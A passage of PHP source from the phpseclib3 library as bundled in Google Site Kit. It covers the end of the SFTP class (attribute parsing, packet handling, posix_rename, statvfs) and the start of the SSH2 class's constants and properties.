2^50 bytes = 1024 TiB. list($attr['size']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Q', $response); break; case NET_SFTP_ATTR_UIDGID: // 0x00000002 (SFTPv3 only) list($attr['uid'], $attr['gid']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NN', $response); break; case NET_SFTP_ATTR_PERMISSIONS: // 0x00000004 list($attr['mode']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); $fileType = $this->parseMode($attr['mode']); if ($this->version < 4 && $fileType !== \false) { $attr += ['type' => $fileType]; } break; case NET_SFTP_ATTR_ACCESSTIME: // 0x00000008 if ($this->version >= 4) { $attr += $this->parseTime('atime', $flags, $response); break; } list($attr['atime'], $attr['mtime']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NN', $response); break; case NET_SFTP_ATTR_CREATETIME: // 0x00000010 (SFTPv4+) $attr += $this->parseTime('createtime', $flags, $response); break; case NET_SFTP_ATTR_MODIFYTIME: // 0x00000020 $attr += $this->parseTime('mtime', $flags, $response); break; case NET_SFTP_ATTR_ACL: // 0x00000040 // access control list // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-04#section-5.7 // currently unsupported list($count) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($type, $flag, $mask, $who) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N3s', $result); } break; case NET_SFTP_ATTR_OWNERGROUP: // 0x00000080 list($attr['owner'], $attr['$group']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $response); break; case NET_SFTP_ATTR_SUBSECOND_TIMES: // 0x00000100 break; case NET_SFTP_ATTR_BITS: // 0x00000200 (SFTPv5+) // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-05#section-5.8 // currently unsupported // tells if you file is: // readonly, system, hidden, case inensitive, archive, encrypted, compressed, sparse // append only, immutable, sync list($attrib_bits, $attrib_bits_valid) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N2', $response); // if we were actually gonna implement the above it ought to be // $attr['attrib-bits'] and $attr['attrib-bits-valid'] // eg. - instead of _ break; case NET_SFTP_ATTR_ALLOCATION_SIZE: // 0x00000400 (SFTPv6+) // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.4 // represents the number of bytes that the file consumes on the disk. will // usually be larger than the 'size' field list($attr['allocation-size']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Q', $response); break; case NET_SFTP_ATTR_TEXT_HINT: // 0x00000800 // https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.10 // currently unsupported // tells if file is "known text", "guessed text", "known binary", "guessed binary" list($text_hint) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); // the above should be $attr['text-hint'] break; case NET_SFTP_ATTR_MIME_TYPE: // 0x00001000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.11 list($attr['mime-type']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); break; case NET_SFTP_ATTR_LINK_COUNT: // 0x00002000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.12 list($attr['link-count']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); break; case NET_SFTP_ATTR_UNTRANSLATED_NAME: // 0x00004000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.13 list($attr['untranslated-name']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); break; case NET_SFTP_ATTR_CTIME: // 0x00008000 // 'ctime' contains the last time the file attributes were changed. The // exact meaning of this field depends on the server. $attr += $this->parseTime('ctime', $flags, $response); break; case NET_SFTP_ATTR_EXTENDED: // 0x80000000 list($count) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($key, $value) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $response); $attr[$key] = $value; } } } return $attr; } /** * Attempt to identify the file type * * Quoting the SFTP RFC, "Implementations MUST NOT send bits that are not defined" but they seem to anyway * * @param int $mode * @return int */ private function parseMode($mode) { // values come from http://lxr.free-electrons.com/source/include/uapi/linux/stat.h#L12 // see, also, http://linux.die.net/man/2/stat switch ($mode & 0170000) { // ie. 1111 0000 0000 0000 case 00: // no file type specified - figure out the file type using alternative means return \false; case 040000: return NET_SFTP_TYPE_DIRECTORY; case 0100000: return NET_SFTP_TYPE_REGULAR; case 0120000: return NET_SFTP_TYPE_SYMLINK; // new types introduced in SFTPv5+ // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-05#section-5.2 case 010000: // named pipe (fifo) return NET_SFTP_TYPE_FIFO; case 020000: // character special return NET_SFTP_TYPE_CHAR_DEVICE; case 060000: // block special return NET_SFTP_TYPE_BLOCK_DEVICE; case 0140000: // socket return NET_SFTP_TYPE_SOCKET; case 0160000: // whiteout // "SPECIAL should be used for files that are of // a known type which cannot be expressed in the protocol" return NET_SFTP_TYPE_SPECIAL; default: return NET_SFTP_TYPE_UNKNOWN; } } /** * Parse Longname * * SFTPv3 doesn't provide any easy way of identifying a file type. You could try to open * a file as a directory and see if an error is returned or you could try to parse the * SFTPv3-specific longname field of the SSH_FXP_NAME packet. That's what this function does. * The result is returned using the * {@link http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-5.2 SFTPv4 type constants}. * * If the longname is in an unrecognized format bool(false) is returned. * * @param string $longname * @return mixed */ private function parseLongname($longname) { // http://en.wikipedia.org/wiki/Unix_file_types // http://en.wikipedia.org/wiki/Filesystem_permissions#Notation_of_traditional_Unix_permissions if (\preg_match('#^[^/]([r-][w-][xstST-]){3}#', $longname)) { switch ($longname[0]) { case '-': return NET_SFTP_TYPE_REGULAR; case 'd': return NET_SFTP_TYPE_DIRECTORY; case 'l': return NET_SFTP_TYPE_SYMLINK; default: return NET_SFTP_TYPE_SPECIAL; } } return \false; } /** * Sends SFTP Packets * * See '6. General Packet Format' of draft-ietf-secsh-filexfer-13 for more info. * * @param int $type * @param string $data * @param int $request_id * @see self::_get_sftp_packet() * @see self::send_channel_packet() * @return void */ private function send_sftp_packet($type, $data, $request_id = 1) { // in SSH2.php the timeout is cumulative per function call. eg. exec() will // timeout after 10s. but for SFTP.php it's cumulative per packet $this->curTimeout = $this->timeout; $this->is_timeout = \false; $packet = $this->use_request_id ? \pack('NCNa*', \strlen($data) + 5, $type, $request_id, $data) : \pack('NCa*', \strlen($data) + 1, $type, $data); $start = \microtime(\true); $this->send_channel_packet(self::CHANNEL, $packet); $stop = \microtime(\true); if (\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_LOGGING')) { $packet_type = '-> ' . self::$packet_types[$type] . ' (' . \round($stop - $start, 4) . 's)'; $this->append_log($packet_type, $data); } } /** * Resets the SFTP channel for re-use */ private function reset_sftp() { $this->use_request_id = \false; $this->pwd = \false; $this->requestBuffer = []; $this->partial_init = \false; } /** * Resets a connection for re-use */ protected function reset_connection() { parent::reset_connection(); $this->reset_sftp(); } /** * Receives SFTP Packets * * See '6. General Packet Format' of draft-ietf-secsh-filexfer-13 for more info. * * Incidentally, the number of SSH_MSG_CHANNEL_DATA messages has no bearing on the number of SFTP packets present. * There can be one SSH_MSG_CHANNEL_DATA messages containing two SFTP packets or there can be two SSH_MSG_CHANNEL_DATA * messages containing one SFTP packet. * * @see self::_send_sftp_packet() * @return string */ private function get_sftp_packet($request_id = null) { $this->channel_close = \false; if (isset($request_id) && isset($this->requestBuffer[$request_id])) { $this->packet_type = $this->requestBuffer[$request_id]['packet_type']; $temp = $this->requestBuffer[$request_id]['packet']; unset($this->requestBuffer[$request_id]); return $temp; } // in SSH2.php the timeout is cumulative per function call. eg. exec() will // timeout after 10s. but for SFTP.php it's cumulative per packet $this->curTimeout = $this->timeout; $this->is_timeout = \false; $start = \microtime(\true); // SFTP packet length while (\strlen($this->packet_buffer) < 4) { $temp = $this->get_channel_packet(self::CHANNEL, \true); if ($temp === \true) { if ($this->channel_status[self::CHANNEL] === NET_SSH2_MSG_CHANNEL_CLOSE) { $this->channel_close = \true; } $this->packet_type = \false; $this->packet_buffer = ''; return \false; } $this->packet_buffer .= $temp; } if (\strlen($this->packet_buffer) < 4) { throw new \RuntimeException('Packet is too small'); } \extract(\unpack('Nlength', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->packet_buffer, 4))); /** @var integer $length */ $tempLength = $length; $tempLength -= \strlen($this->packet_buffer); // 256 * 1024 is what SFTP_MAX_MSG_LENGTH is set to in OpenSSH's sftp-common.h if (!$this->allow_arbitrary_length_packets && !$this->use_request_id && $tempLength > 256 * 1024) { throw new \RuntimeException('Invalid Size'); } // SFTP packet type and data payload while ($tempLength > 0) { $temp = $this->get_channel_packet(self::CHANNEL, \true); if ($temp === \true) { if ($this->channel_status[self::CHANNEL] === NET_SSH2_MSG_CHANNEL_CLOSE) { $this->channel_close = \true; } $this->packet_type = \false; $this->packet_buffer = ''; return \false; } $this->packet_buffer .= $temp; $tempLength -= \strlen($temp); } $stop = \microtime(\true); $this->packet_type = \ord(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->packet_buffer)); if ($this->use_request_id) { \extract(\unpack('Npacket_id', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->packet_buffer, 4))); // remove the request id $length -= 5; // account for the request id and the packet type } else { $length -= 1; // account for the packet type } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->packet_buffer, $length); if (\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_LOGGING')) { $packet_type = '<- ' . self::$packet_types[$this->packet_type] . ' (' . \round($stop - $start, 4) . 's)'; $this->append_log($packet_type, $packet); } if (isset($request_id) && $this->use_request_id && $packet_id != $request_id) { $this->requestBuffer[$packet_id] = ['packet_type' => $this->packet_type, 'packet' => $packet]; return $this->get_sftp_packet($request_id); } return $packet; } /** * Logs data packets * * Makes sure that only the last 1MB worth of packets will be logged * * @param string $message_number * @param string $message */ private function append_log($message_number, $message) { $this->append_log_helper(NET_SFTP_LOGGING, $message_number, $message, $this->packet_type_log, $this->packet_log, $this->log_size, $this->realtime_log_file, $this->realtime_log_wrap, $this->realtime_log_size); } /** * Returns a log of the packets that have been sent and received. * * Returns a string if NET_SFTP_LOGGING == self::LOG_COMPLEX, an array if NET_SFTP_LOGGING == self::LOG_SIMPLE and false if !defined('NET_SFTP_LOGGING') * * @return array|string|false */ public function getSFTPLog() { if (!\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_LOGGING')) { return \false; } switch (NET_SFTP_LOGGING) { case self::LOG_COMPLEX: return $this->format_log($this->packet_log, $this->packet_type_log); break; //case self::LOG_SIMPLE: default: return $this->packet_type_log; } } /** * Returns all errors on the SFTP layer * * @return array */ public function getSFTPErrors() { return $this->sftp_errors; } /** * Returns the last error on the SFTP layer * * @return string */ public function getLastSFTPError() { return \count($this->sftp_errors) ? $this->sftp_errors[\count($this->sftp_errors) - 1] : ''; } /** * Get supported SFTP versions * * @return array */ public function getSupportedVersions() { if (!($this->bitmap & \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::MASK_LOGIN)) { return \false; } if (!$this->partial_init) { $this->partial_init_sftp_connection(); } $temp = ['version' => $this->defaultVersion]; if (isset($this->extensions['versions'])) { $temp['extensions'] = $this->extensions['versions']; } return $temp; } /** * Get supported SFTP extensions * * @return array */ public function getSupportedExtensions() { if (!($this->bitmap & \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::MASK_LOGIN)) { return \false; } if (!$this->partial_init) { $this->partial_init_sftp_connection(); } return $this->extensions; } /** * Get supported SFTP versions * * @return int|false */ public function getNegotiatedVersion() { if (!$this->precheck()) { return \false; } return $this->version; } /** * Set preferred version * * If you're preferred version isn't supported then the highest supported * version of SFTP will be utilized. Set to null or false or int(0) to * unset the preferred version * * @param int $version */ public function setPreferredVersion($version) { $this->preferredVersion = $version; } /** * Disconnect * * @param int $reason * @return false */ protected function disconnect_helper($reason) { $this->pwd = \false; return parent::disconnect_helper($reason); } /** * Enable Date Preservation * */ public function enableDatePreservation() { $this->preserveTime = \true; } /** * Disable Date Preservation * */ public function disableDatePreservation() { $this->preserveTime = \false; } /** * POSIX Rename * * Where rename() fails "if there already exists a file with the name specified by newpath" * (draft-ietf-secsh-filexfer-02#section-6.5), posix_rename() overwrites the existing file in an atomic fashion. * ie. "there is no observable instant in time where the name does not refer to either the old or the new file" * (draft-ietf-secsh-filexfer-13#page-39). * * @param string $oldname * @param string $newname * @return bool */ public function posix_rename($oldname, $newname) { if (!$this->precheck()) { return \false; } $oldname = $this->realpath($oldname); $newname = $this->realpath($newname); if ($oldname === \false || $newname === \false) { return \false; } if ($this->version >= 5) { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ssN', $oldname, $newname, 2); // 2 = SSH_FXP_RENAME_ATOMIC $this->send_sftp_packet(NET_SFTP_RENAME, $packet); } elseif (isset($this->extensions['posix-rename@openssh.com']) && $this->extensions['posix-rename@openssh.com'] === '1') { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sss', 'posix-rename@openssh.com', $oldname, $newname); $this->send_sftp_packet(NET_SFTP_EXTENDED, $packet); } else { throw new \RuntimeException("Extension 'posix-rename@openssh.com' is not supported by the server. " . "Call getSupportedVersions() to see a list of supported extension"); } $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // if $status isn't SSH_FX_OK it's probably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } // don't move the stat cache entry over since this operation could very well change the // atime and mtime attributes //$this->update_stat_cache($newname, $this->query_stat_cache($oldname)); $this->remove_from_stat_cache($oldname); $this->remove_from_stat_cache($newname); return \true; } /** * Returns general information about a file system. * * The function statvfs() returns information about a mounted filesystem. * @see https://man7.org/linux/man-pages/man3/statvfs.3.html * * @param string $path * @return false|array{bsize: int, frsize: int, blocks: int, bfree: int, bavail: int, files: int, ffree: int, favail: int, fsid: int, flag: int, namemax: int} */ public function statvfs($path) { if (!$this->precheck()) { return \false; } if (!isset($this->extensions['statvfs@openssh.com']) || $this->extensions['statvfs@openssh.com'] !== '2') { throw new \RuntimeException("Extension 'statvfs@openssh.com' is not supported by the server. " . "Call getSupportedVersions() to see a list of supported extension"); } $realpath = $this->realpath($path); if ($realpath === \false) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'statvfs@openssh.com', $realpath); $this->send_sftp_packet(NET_SFTP_EXTENDED, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type !== NET_SFTP_EXTENDED_REPLY) { throw new \UnexpectedValueException('Expected SSH_FXP_EXTENDED_REPLY. ' . 'Got packet type: ' . $this->packet_type); } /** * These requests return a SSH_FXP_STATUS reply on failure. On success they * return the following SSH_FXP_EXTENDED_REPLY reply: * * uint32 id * uint64 f_bsize file system block size * uint64 f_frsize fundamental fs block size * uint64 f_blocks number of blocks (unit f_frsize) * uint64 f_bfree free blocks in file system * uint64 f_bavail free blocks for non-root * uint64 f_files total file inodes * uint64 f_ffree free file inodes * uint64 f_favail free file inodes for to non-root * uint64 f_fsid file system id * uint64 f_flag bit mask of f_flag values * uint64 f_namemax maximum filename length */ return \array_combine(['bsize', 'frsize', 'blocks', 'bfree', 'bavail', 'files', 'ffree', 'favail', 'fsid', 'flag', 'namemax'], \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('QQQQQQQQQQQ', $response)); } } <?php /** * Pure-PHP implementation of SSHv2. * * PHP version 5 * * Here are some examples of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $ssh = new \phpseclib3\Net\SSH2('www.domain.tld'); * if (!$ssh->login('username', 'password')) { * exit('Login Failed'); * } * * echo $ssh->exec('pwd'); * echo $ssh->exec('ls -la'); * ?> * </code> * * <code> * <?php * include 'vendor/autoload.php'; * * $key = \phpseclib3\Crypt\PublicKeyLoader::load('...', '(optional) password'); * * $ssh = new \phpseclib3\Net\SSH2('www.domain.tld'); * if (!$ssh->login('username', $key)) { * exit('Login Failed'); * } * * echo $ssh->read('username@username:~$'); * $ssh->write("ls -la\n"); * echo $ssh->read('username@username:~$'); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Net; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Blowfish; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\SymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES; // Used to do Diffie-Hellman key exchange and DSA/RSA signature verification. use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Twofish; use Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InvalidPacketLengthException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\NoSupportedAlgorithmsException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\TimeoutException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnableToConnectException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent; /** * Pure-PHP implementation of SSHv2. * * @author Jim Wigginton <terrafrost@php.net> */ class SSH2 { /**#@+ * Compression Types * */ /** * No compression */ const NET_SSH2_COMPRESSION_NONE = 1; /** * zlib compression */ const NET_SSH2_COMPRESSION_ZLIB = 2; /** * zlib@openssh.com */ const NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH = 3; /**#@-*/ // Execution Bitmap Masks const MASK_CONSTRUCTOR = 0x1; const MASK_CONNECTED = 0x2; const MASK_LOGIN_REQ = 0x4; const MASK_LOGIN = 0x8; const MASK_SHELL = 0x10; const MASK_DISCONNECT = 0x20; /* * Channel constants * * RFC4254 refers not to client and server channels but rather to sender and recipient channels. we don't refer * to them in that way because RFC4254 toggles the meaning. the client sends a SSH_MSG_CHANNEL_OPEN message with * a sender channel and the server sends a SSH_MSG_CHANNEL_OPEN_CONFIRMATION in response, with a sender and a * recipient channel. at first glance, you might conclude that SSH_MSG_CHANNEL_OPEN_CONFIRMATION's sender channel * would be the same thing as SSH_MSG_CHANNEL_OPEN's sender channel, but it's not, per this snippet: * The 'recipient channel' is the channel number given in the original * open request, and 'sender channel' is the channel number allocated by * the other side. * * @see \phpseclib3\Net\SSH2::send_channel_packet() * @see \phpseclib3\Net\SSH2::get_channel_packet() */ const CHANNEL_EXEC = 1; // PuTTy uses 0x100 const CHANNEL_SHELL = 2; const CHANNEL_SUBSYSTEM = 3; const CHANNEL_AGENT_FORWARD = 4; const CHANNEL_KEEP_ALIVE = 5; /** * Returns the message numbers * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_SIMPLE = 1; /** * Returns the message content * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_COMPLEX = 2; /** * Outputs the content real-time */ const LOG_REALTIME = 3; /** * Dumps the content real-time to a file */ const LOG_REALTIME_FILE = 4; /** * Outputs the message numbers real-time */ const LOG_SIMPLE_REALTIME = 5; /* * Dumps the message numbers real-time */ const LOG_REALTIME_SIMPLE = 5; /** * Make sure that the log never gets larger than this * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_MAX_SIZE = 1048576; // 1024 * 1024 /** * Returns when a string matching $expect exactly is found * * @see \phpseclib3\Net\SSH2::read() */ const READ_SIMPLE = 1; /** * Returns when a string matching the regular expression $expect is found * * @see \phpseclib3\Net\SSH2::read() */ const READ_REGEX = 2; /** * Returns whenever a data packet is received. * * Some data packets may only contain a single character so it may be necessary * to call read() multiple times when using this option * * @see \phpseclib3\Net\SSH2::read() */ const READ_NEXT = 3; /** * The SSH identifier * * @var string */ private $identifier; /** * The Socket Object * * @var resource|closed-resource|null */ public $fsock; /** * Execution Bitmap * * The bits that are set represent functions that have been called already. This is used to determine * if a requisite function has been successfully executed. If not, an error should be thrown. * * @var int */ protected $bitmap = 0; /** * Error information * * @see self::getErrors() * @see self::getLastError() * @var array */ private $errors = []; /** * Server Identifier * * @see self::getServerIdentification() * @var string|false */ protected $server_identifier = \false; /** * Key Exchange Algorithms * * @see self::getKexAlgorithims() * @var array|false */ private $kex_algorithms = \false; /** * Key Exchange Algorithm * * @see self::getMethodsNegotiated() * @var string|false */ private $kex_algorithm = \false; /** * Minimum Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_min = 1536; /** * Preferred Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_preferred = 2048; /** * Maximum Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_max = 4096; /** * Server Host Key Algorithms * * @see self::getServerHostKeyAlgorithms() * @var array|false */ private $server_host_key_algorithms = \false; /** * Supported Private Key Algorithms * * In theory this should be the same as the Server Host Key Algorithms but, in practice, * some servers (eg. Azure) will support rsa-sha2-512 as a server host key algorithm but * not a private key algorithm * * @see self::privatekey_login() * @var array|false */ private $supported_private_key_algorithms = \false; /** * Encryption Algorithms: Client to Server * * @see self::getEncryptionAlgorithmsClient2Server() * @var array|false */ private $encryption_algorithms_client_to_server = \false; /** * Encryption Algorithms: Server to Client * * @see self::getEncryptionAlgorithmsServer2Client() * @var array|false */ private $encryption_algorithms_server_to_client = \false; /** * MAC Algorithms: Client to Server * * @see self::getMACAlgorithmsClient2Server() * @var array|false */ private $mac_algorithms_client_to_server = \false; /** * MAC Algorithms: Server to Client * * @see self::getMACAlgorithmsServer2Client() * @var array|false */ private $mac_algorithms_server_to_client = \false; /** * Compression Algorithms: Client to Server * * @see self::getCompressionAlgorithmsClient2Server() * @var array|false */ private $compression_algorithms_client_to_server = \false; /** * Compression Algorithms: Server to Client * * @see self::getCompressionAlgorithmsServer2Client() * @var array|false */ private $compression_algorithms_server_to_client = \false; /** * Languages: Server to Client * * @see self::getLanguagesServer2Client() * @var array|false */ private $languages_server_to_client = \false; /** * Languages: Client to Server * * @see self::getLanguagesClient2Server() * @var array|false */ private $languages_client_to_server = \false; /** * Preferred Algorithms * * @see self::setPreferredAlgorithms() * @var array */ private $preferred = []; /** * Block Size for Server to Client Encryption * * "Note that the length of the concatenation of 'packet_length', * 'padding_length', 'payload', and 'random padding' MUST be a multiple * of the cipher block size or 8, whichever is larger. This constraint * MUST be enforced, even when using stream ciphers." * * -- http://tools.ietf.org/html/rfc4253#section-6 * * @see self::__construct() * @see self::_send_binary_packet() * @var int */ private $encrypt_block_size = 8; /** * Block Size for Client to Server Encryption * * @see self::__construct() * @see self::_get_binary_packet() * @var int */ private $decrypt_block_size = 8; /** * Server to Client Encryption Object * * @see self::_get_binary_packet() * @var SymmetricKey|false */ private $decrypt = \false; /** * Decryption Algorithm Name * * @var string|null */ private $decryptName; /** * Decryption Invocation Counter * * Used by GCM * * @var string|null */ private $decryptInvocationCounter; /** * Fixed Part of Nonce * * Used by GCM * * @var string|null */ private $decryptFixedPart; /** * Server to Client Length Encryption Object * * @see self::_get_binary_packet() * @var object */ private $lengthDecrypt = \false; /** * Client to Server Encryption Object * * @see self::_send_binary_packet() * @var SymmetricKey|false */ private $encrypt = \false; /** * Encryption Algorithm Name * * @var string|null */ private $encryptName; /** * Encryption Invocation Counter * * Used by GCM * * @var string|null */ private $encryptInvocationCounter; /** * Fixed Part of Nonce * * Used by GCM * * @var string|null */ private $encryptFixedPart; /** * Client to Server Length Encryption Object * * @see self::_send_binary_packet() * @var object */ private $lengthEncrypt = \false; /** * Client to Server HMAC Object * * @see self::_send_binary_packet() * @var object */ private $hmac_create = \false; /** * Client to Server HMAC Name * * @var string|false */ private $hmac_create_name; /** * Client to Server ETM * * @var int|false */ private $hmac_create_etm; /** * Server to Client HMAC Object * * @see self::_get_binary_packet() * @var object */ private $hmac_check = \false; /** * Server to Client HMAC Name * * @var string|false */ private $hmac_check_name; /** * Server to Client ETM * * @var int|false */ private $hmac_check_etm; /** * Size of server to client HMAC * * We need to know how big the HMAC will be for the server to client direction so that we know how many bytes to read. * For the client to server side, the HMAC object will make the HMAC as long as it needs to be. All we need to do is * append it. * * @see self::_get_binary_packet() * @var int */ private $hmac_size = \false; /** * Server Public Host Key * * @see self::getServerPublicHostKey() * @var string */ private $server_public_host_key; /** * Session identifier * * "The exchange hash H from the first key exchange is additionally * used as the session identifier, which is a unique identifier for * this connection." * * -- http://tools.ietf.org/html/rfc4253#section-7.2 * * @see self::_key_exchange() * @var string */ private $session_id = \false; /** * Exchange hash * * The current exchange hash * * @see self::_key_exchange() * @var string */ private $exchange_hash = \false; /** * Message Numbers * * @see self::__construct() * @var array * @access private */ private static $message_numbers = []; /** * Disconnection Message 'reason codes' defined in RFC4253 * * @see self::__construct() * @var array * @access private */ private static $disconnect_reasons = []; /** * SSH_MSG_CHANNEL_OPEN_FAILURE 'reason codes', defined in RFC4254 * * @see self::__construct() * @var array * @access private */ private static $channel_open_failure_reasons = []; /** * Terminal Modes * * @link http://tools.ietf.org/html/rfc4254#section-8 * @see self::__construct() * @var array * @access private */ private static $terminal_modes = []; /** * SSH_MSG_CHANNEL_EXTENDED_DATA's data_type_codes * * @link http://tools.ietf.org/html/rfc4254#section-5.2 * @see self::__construct() * @var array * @access private */ private static $channel_extended_data_type_codes = []; /** * Send Sequence Number * * See 'Section 6.4. Data Integrity' of rfc4253 for more info. * * @see self::_send_binary_packet() * @var int */ private $send_seq_no = 0; /** * Get Sequence Number * * See 'Section 6.4. Data Integrity' of rfc4253 for more info. * * @see self::_get_binary_packet() * @var int */ private $get_seq_no = 0; /** * Server Channels * * Maps client channels to server channels * * @see self::get_channel_packet() * @see self::exec() * @var array */ protected $server_channels = []; /** * Channel Read Buffers * * If a client requests a packet from one channel but receives two packets from another those packets should * be placed in a buffer * * @see self::get_channel_packet() * @see self::exec() * @var array */ private $channel_buffers = []; /** * Channel Write Buffers * * If a client sends a packet and receives a timeout error mid-transmission, buffer the data written so it * can be de-duplicated upon resuming write * * @see self::send_channel_packet() * @var array */ private $channel_buffers_write = []; /** * Channel Status * * Contains the type of the last sent message * * @see self::get_channel_packet() * @var array */ protected $channel_status = []; /** * The identifier of the interactive channel which was opened most recently * * @see self::getInteractiveChannelId() * @var int */ private $channel_id_last_interactive = 0; /** * Packet Size * * Maximum packet size indexed by channel * * @see self::send_channel_packet() * @var array */ private $packet_size_client_to_server = []; /** * Message Number Log * * @see self::getLog() * @var array */ private $message_number_log = []; /** * Message Log * * @see self::getLog() * @var array */ private $message_log = []; /** * The Window Size * * Bytes the other party can send before it must wait for the window to be adjusted (0x7FFFFFFF = 2GB) * * @var int * @see self::send_channel_packet() * @see self::exec() */ protected $window_size = 0x7fffffff; /** * What we resize the window to * * When PuTTY resizes the window it doesn't add an additional 0x7FFFFFFF bytes - it adds 0x40000000 bytes. * Some SFTP clients (GoAnywhere) don't support adding 0x7FFFFFFF to the window size after the fact so * we'll just do what PuTTY does * * @var int * @see self::_send_channel_packet() * @see self::exec() */ private $window_resize = 0x40000000; /** * Window size, server to client * * Window size indexed by channel * * @see self::send_channel_packet() * @var array */ protected $window_size_server_to_client = []; /** * Window size, client to server * * Window size indexed by channel * * @see self::get_channel_packet() * @var array */ private $window_size_client_to_server = []; /** * Server signature * * Verified against $this->session_id * * @see self::getServerPublicHostKey() * @var string */ private $signature = ''; /** * Server signature format * * ssh-rsa or ssh-dss. * * @see self::getServerPublicHostKey() * @var string */ private 